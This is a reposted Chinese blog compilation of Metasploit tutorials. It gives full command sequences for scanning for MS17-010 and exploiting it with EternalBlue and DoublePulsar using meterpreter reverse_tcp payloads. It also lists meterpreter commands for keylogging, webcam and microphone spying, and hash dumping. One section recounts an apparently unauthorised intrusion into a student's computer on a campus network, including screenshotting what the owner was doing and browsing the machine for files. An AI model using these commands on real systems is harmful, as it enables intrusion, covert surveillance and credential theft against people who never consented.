ms17_010扫描工具

ms17_010扫描工具

http://www.51testing.com/html/35/n-3720435.html

msf中的辅助模块含有一个强大的ms17_010扫描工具:

auxiliary/scanner/smb/smb_ms17_010

使用这个工具可以快速扫描某个网段中含有ms17_010漏洞的主机,该工具的使用也很简单。

首先确定要扫描的网段,以我学校的校园局域网为例,要扫描的网段为10.31.0.0/16。实际上经过测试,只需扫描10.31.0-128.1-254 就可以了。

具体的命令如下:

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 10.31.0-128.1-254
set threads 512
exploit

ms17_010扫描工具_第1张图片

扫描的部分结果如下图所示:

ms17_010扫描工具_第2张图片

上图中,左侧有绿色加号标记的主机并且被识别出来是Windows 7的主机有很大概率存在该漏洞。如果被识别出是Windows 8 或者 Windows 10的主机,基本上是不能成功的。当尝试完Windows 7 的后,如果还没有一台可以入侵的,可以继续尝试那些左侧是红色减号并且没有识别出系统版本的。

好了,目标主机有了,下面就是开始入侵了!

利用ms17_010入侵主机

msf中的exploit模块中含有ms17_010的利用工具:

exploit/windows/smb/ms17_010_eternalblue

该工具的使用也很简单,只要设置好目标主要的ip和payload就可以exploit了。

需要注意的是,在使用该exploit入侵主机时,如果一次不能成功,尽量不要尝试第二次了,这样很容易把目标主机搞崩溃。

具体的命令如下:

use exploit/windows/smb/ms17_010_eternalblue
set rhost 10.31.36.66
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.31.30.49
set lport 4567
exploit

以上命令中的10.31.36.66为目标主机,监听反连的主机ip为10.31.30.49,也就是自己的主机ip,监听的端口为4567端口。

不过上面那台主机并没有成功,下面是另外一台成功入侵的截图:

ms17_010扫描工具_第3张图片

可以上面中的10.31.36.103 主机被成功入侵了:)。

然后输入screenshot截个图看看主人在干什么吧。

screenshot

ms17_010扫描工具_第4张图片

好吧,在看LOL比赛 0.0 。

我还是简单看看机子上有没动作片好下载,然后上传个txt提醒他修复漏洞好了。我们都是有操守的白帽子对吧:)。

至此,利用MSF对ms17_010漏洞主机的发现和入侵过程就结束了,通过这些对校园网的扫描,发现还是有大部分主机是存在该漏洞的。。。

*本文原创作者:TimeShatter,本文属FreeBuf原创奖励计划,未经许可禁止转载


PS:小白初学kali,最近扫描自己测试的一台WIN7 32位机器有MS17-010漏洞,在百度查找使用方法,发现大多数都是在X64位的机器上使用,经过多篇博客的学习,成功攻入!分享出来做交流!

环境:
攻击机:kali-linux-2018.2                      IP:192.168.1.200
靶机:WIN7 X32 旗舰版 Service Pack 1  IP:192.168.1.126



一、首先使用 nessus 扫描漏洞(可以使用 msf 自带的ms17-010扫描工具)
 



二、开始攻击
1、进入msfconsole
root@kali:~# msfconsole 
 

2、加载攻击模块
msf自带的攻击模块   use auxiliary/scanner/smb/smb_ms17_010  但是经过测试发现这个模块只能运用在64位架构的系统上 ,我们攻击的靶机确实32位的,所以会报错,但是msf自带是没有32位的攻击模块的,所以需要去github下载我们需要用到的模块。
下载地址:https://github.com/ElevenPaths/E ... epulsar-Metasploit/  
下载的文件夹改名为Eternalblue-Doublepulsar-metasploit 放在/root下,如果不改名在之后的攻击中将会报错!
将下载的
eternalblue_doublepulsar.rb,拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb目录中。
msf >reload_all  //更新

下载完成后加载我们的攻击模块
msf > use exploit/windows/smb/eternalblue_doublepulsar 
//设置options
msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost 192.168.1.126   //我们的靶机
rhost => 192.168.1.126
//加载payload
msf exploit(windows/smb/eternalblue_doublepulsar) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.168.1.200  //设置监听
lhost => 192.168.1.200
msf exploit(windows/smb/eternalblue_doublepulsar) > set processinject explorer.exe //修改注入进程
processinject => explorer.exe

//开始攻击
msf exploit(windows/smb/eternalblue_doublepulsar) > run

//成功攻入
 

meterpreter > 
3、测试
屏幕截图  
meterpreter > screenshot
Screenshot saved to: /root/HNAdRQLd.jpeg
 
至此已成功获取靶机的控制权限!


三、可能会遇到的问题
1、  
模块使用错误,应该使用自己下载的模块


2.  
解决方案  
首先 root@kali:~# apt-get install wine32  
确保安装了wine32
打开多架构支持 
root@kali:~# wine32 -h


然后 检查是否将下载的文件移到root目录下,并保证已改名



Metasploit之木马的用户操作及摄像头操作

本章节内容是上接”09-Metasploit之我的远程控制软件”的,

首先还是生产木马,选择TCP反向连接方式,监听相关IP和端口,受害者打开木马,连接成功回显↓

meterpreter > 

进入meterpreter之后即可进行一些相关木马操作了,下面是正式本章内容

首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓

------------------------------------------------------------------------------------------------

用户操作:Stdapi: User interface Commands(用户接口命令)

enumdesktops    -->列出所有可访问的桌面和窗口站(窗体列表)
getdesktop      -->得到当前的Meterpreter桌面

idletime        -->返回秒远程用户已经闲置数量

keyscan_dump    -->转储按键缓冲(下载键盘记录)
keyscan_start   -->开始捕获击键(开始键盘记录)
keyscan_stop    -->停止捕获击键(停止键盘记录)
screenshot      -->抓取交互式桌面截图(当前操作界面截图一张)
setdesktop      -->改变meterpreters当前桌面

uictl           -->控制一些用户界面组件(获取键盘、鼠标控制权)
使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)

PS:键盘记录注意点,先开始,后下载,再结束,否则会出错


摄像头:Stdapi: Webcam Commands(摄像头命令)

record_mic       -->X秒从默认的麦克风record_mic音频记录(音频录制)

webcam_chat      -->开始视频聊天(视频,对方会有弹窗)

webcam_list      -->单摄像头(查看摄像头列表)
webcam_snap      -->采取快照从指定的摄像头(摄像头拍摄一张照片)

webcam_stream    -->播放视频流从指定的摄像头(开启摄像头监控)


其他命令操作

getsystem        -->获取高权限
 
hashdump         -->获取当前用户hash


你可能感兴趣的:(kali)